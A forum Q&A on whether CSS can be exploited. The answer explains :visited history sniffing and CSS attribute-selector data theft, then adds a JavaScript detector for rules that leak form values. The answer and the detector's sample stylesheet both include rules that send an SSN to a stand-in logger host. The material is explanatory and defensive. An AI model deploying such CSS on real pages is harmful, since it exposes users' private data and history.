Question

CSS

By matthewjohn938
Is CSS vulnerable to exploitation more than HTML?

All Answers

css

by deborasumopayroll In reply to CSS

The Visited Link Concern
This one goes like this:

You put a link to a particular page on your site, say <a href="https://i-tickle-pigs.com">Tickle Pigs</a>
You style the visited state of that link like a:visited { color: pink; } which is not a default user agent style.
You test the computed style of that link.
If it’s pink, this user is a pig tickler.
You report that pig tickling information back to some server somewhere and presumably triple their pig owning insurance rates as surely the pigs will suffer extreme emotional distress over all the tickling.
You might even be able to do it entirely in CSS, because that :visited style might have like background-image: url(/data-logger/tickle.php); which is only requested by pig ticklers.

The Data Thief
This one goes like this:

If I can get some of my nefarious CSS onto a page where you’ve authenticated into a site…
And that site displays sensitive information like a social security number (SSN) in a pre-filled form…
I can use attribute selectors to figure it out.
input#ssn[value="123-45-6789"] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }
A billion selectors and you’ve covered all the possibilities!
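
A defender-side check for the pattern described under "The Data Thief", added here as an example and not part of the original post: it scans stylesheet text for rules that select on a field's value attribute and load a URL from another origin. The function name, the sample CSS and the .example hosts are constructed for illustration, and the parser only handles flat `selector { declarations }` rules.

```javascript
// Added example: flag CSS rules that match on a form field's value
// and fetch a URL from an origin other than the page's own.
// Assumption: flat rules only; nested at-rules (@media, @supports) are not unwrapped.

// Attribute selectors on `value` with any match operator (=, ^=, $=, *=, ~=, |=).
const VALUE_SELECTOR = /\[\s*value\s*[~|^$*]?=/i;
// url(...) tokens, quoted or unquoted.
const URL_TOKEN = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;

function findValueLeakRules(cssText, pageOrigin) {
  const origin = new URL(pageOrigin).origin; // normalise "https://host/" to "https://host"
  const findings = [];
  const withoutComments = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  const rulePattern = /([^{}]+)\{([^{}]*)\}/g;
  let rule;
  while ((rule = rulePattern.exec(withoutComments)) !== null) {
    const selector = rule[1].trim();
    const declarations = rule[2];
    // Only rules that branch on the current value of a field are of interest.
    if (!VALUE_SELECTOR.test(selector)) continue;
    for (const match of declarations.matchAll(URL_TOKEN)) {
      let target;
      try {
        target = new URL(match[2].trim(), origin); // resolves relative URLs too
      } catch {
        continue; // unparsable URL: the browser would not request it
      }
      // A cross-origin request tied to a value match reveals that value to a third party.
      if (target.origin !== origin) {
        findings.push({ selector, host: target.host });
      }
    }
  }
  return findings;
}

// Constructed sample stylesheet (not taken from any real site).
const SAMPLE_CSS = `
/* constructed sample */
input#ssn[value="123-45-6789"] { background: url(https://collector.example/log?ssn=123-45-6789); }
input[name="q"][value^="a"] { background-image: url("/img/hint.png"); }
a:visited { color: pink; }
.logo { background: url(https://cdn.example/logo.png); }
`;

console.log(findValueLeakRules(SAMPLE_CSS, "https://bank.example"));
```

Only the first sample rule is reported: the second loads a same-origin image, and the last two do not select on a field value.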
